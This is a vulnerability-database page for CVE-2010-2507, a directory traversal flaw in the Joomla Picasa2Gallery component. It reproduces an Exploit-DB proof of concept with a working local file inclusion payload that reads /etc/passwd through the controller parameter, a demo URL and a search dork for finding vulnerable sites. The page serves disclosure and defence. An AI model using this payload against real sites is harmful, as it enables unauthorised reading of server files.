VIR Vulnerability Intelligence Relay

CVE-2010-2507

medium
Published 2010-06-28 ยท Modified 2026-04-29
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
7.8

Description

Directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-13981 webapps php verified text ยท 2 KB
kaMtiEz ยท 2010-06-22

Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion

text exploit Source: Exploit-DB 
[!]===========================================================================[!]

[~] Joomla Component Picasa2Gallery LFI vulnerability 
[~] Author	: kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage	: http://www.indonesiancoder.com
[~] Date	: 22 june, 2010

[!]===========================================================================[!]

[ Software Information ]

[+] Vendor : http://www.masselink.net
[+] Price : free
[+] Vulnerability : LFI
[+] Dork : inurl:"CIHUY" ;)
[+] Download : http://www.masselink.net/downloads/Software/Picasa2Gallery-1.2.8/
[+] Version : 1.2.8 or lower ;)

[!]===========================================================================[!]

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_picasa2gallery&controller=[INDONESIANCODER]

[ XpL ]

../../../../../../../../../../../../../../../etc/passwd%00


[ d3m0 ]

http://sever/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00

[!]===========================================================================[!]

[ Thx TO ]

[+] INDONESIAN CODER TEAM MainHack MAGELANG CYBER ServerIsDown SurabayaHackerLink IndonesianHacker MC-CREW IH-CREW
[+] tukulesto,M3NW5,arianom,N4CK0,Jundab,d0ntcry,bobyhikaru,gonzhack,senot,Jack-
[+] Contrex,YadoY666,bumble_be,MarahMeraH,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,vYcOd,ayy,otong,CS-31,yur4kh4,MISTERFRIBO,GENI212


[ NOTE ] 

[+] WE ARE ONE UNITY, WE ARE A CODER FAMILY, AND WE ARE INDONESIAN CODER TEAM 
[+] Jika kami bersama Nyalakan Tanda Bahaya ;)
[+] Ayy : HappY birthday yak .. maap ketinggalan aha . . .
[+] MALANG ! kami datang ... ^^

[ QUOTE ]

[+] INDONESIANCODER still r0x
[+] nothing secure ..

Application impact
VendorProductVersionsFixed
masselinkcom_picasa2gallery{"endIncluding":"1.2.8"}
masselinkcom_picasa2gallery1.0.0
masselinkcom_picasa2gallery1.1.0
masselinkcom_picasa2gallery1.1.7
masselinkcom_picasa2gallery1.1.9
masselinkcom_picasa2gallery1.2.1
masselinkcom_picasa2gallery1.2.2
masselinkcom_picasa2gallery1.2.5
masselinkcom_picasa2gallery1.2.7
joomla joomlajoomla\!

References

CWEs

CWE-22

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.